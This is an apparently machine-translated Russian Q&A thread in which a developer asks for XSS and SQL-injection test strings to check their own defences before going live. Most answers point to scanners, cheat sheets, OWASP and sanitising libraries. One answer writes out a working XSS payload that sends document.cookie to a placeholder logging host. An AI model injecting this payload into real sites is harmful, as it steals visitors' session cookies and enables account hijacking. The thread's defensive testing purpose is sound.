Может кто-нибудь дать мне некоторые базовые сценарии XSS и sql-инъекций? (не то, что кажется)

Я тестирую свои сценарии, чтобы убедиться, что они будут предотвращать инъекции xss и sql. Может ли кто-нибудь предоставить мне некоторые базовые, но хорошие сценарии, которые "взломали" мои программы. Я хочу проверить свои сценарии, прежде чем он выйдет в Интернет.

РЕДАКТИРОВАТЬ: Спасибо всем за эти ссылки, они содержат грузы и множество информации. Но для новичка для безопасности, есть ли рекомендуемый сайт? Я не уверен, готов ли я погрузиться в проблемы безопасности. Мне нравятся ссылки waiwai933.

Ответ 1

Каждая ситуация требует разных сценариев, поэтому нет "одного размера подходит всем", которое любой может предоставить. Список скриптов, которые нужно протестировать, перейдет в тысячи, прежде чем вы сможете быть уверены, что ваш сайт безопасен.

Возможно, вы захотите проверить плагины Firefox или Chrome, которые позволяют протестировать SQL-инъекции. Я предлагаю это, но вы можете также искать других: https://addons.mozilla.org/en-US/firefox/addon/6727. Что это значит, так это то, что он позволяет вам предоставить список сценариев инъекций, которые, по-видимому, предоставляют несколько по умолчанию, а затем, как только вы активируете его, он бомбардирует ваш сайт этими сценариями и позволяет узнать, где находятся уязвимости.

Я предлагаю этот сайт для некоторых примеров сценариев XSS: http://ha.ckers.org/xss.html

Ответ 2

Шифрование XSS в http://ha.ckers.org/xss.html является хорошей коллекцией тестов XSS. Однако я бы не рекомендовал использовать вашу собственную проверку XSS; это намного сложнее, чем обнаружение SQL-инъекций (как вы, вероятно, поймете, увидев некоторые из примеров в cheatsheet). Единственный твердый метод - это проанализировать код, построить из него дерево DOM и преобразовать это дерево обратно в HTML, и это большая работа, и другие люди уже это сделали. Используйте что-то вроде Очиститель HTML.

Ответ 3

Самый простой, который не блокируется браузерами и может быть легко, если вы не strip_tags(), это следующий код:

<script>(new Image).src = 'http://example.com/logSessions.php?s=' + document.cookie;</script>

Ответ 4

Googe new jarslberg учебный сайт - отличный ресурс, чтобы научить вас писать и защищать от XSS и других других атак безопасности.

Ответ 5

+1 за заботу и знание достаточно, чтобы спросить. Поскольку вы задаете вопросы безопасности, я бы рекомендовал вам OWASP, если вы еще не знакомы. Вы найдете всевозможную информацию сверх того, что вы просили, не говоря уже о тоннах информации о предотвращении всех видов атак. Сайт является бесценным инструментом для веб-разработчиков.

Ответ 6

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Я использовал этот инструмент для достижения отличных результатов.

Ответ 7

Вы можете попробовать с Acunetix Security Scanner, он не будет сканировать только для инъекций XSS и MySQL по умолчанию, но даже для других вид подвигов. Программа практически эмулирует браузер и может вести себя как зарегистрированный пользователь.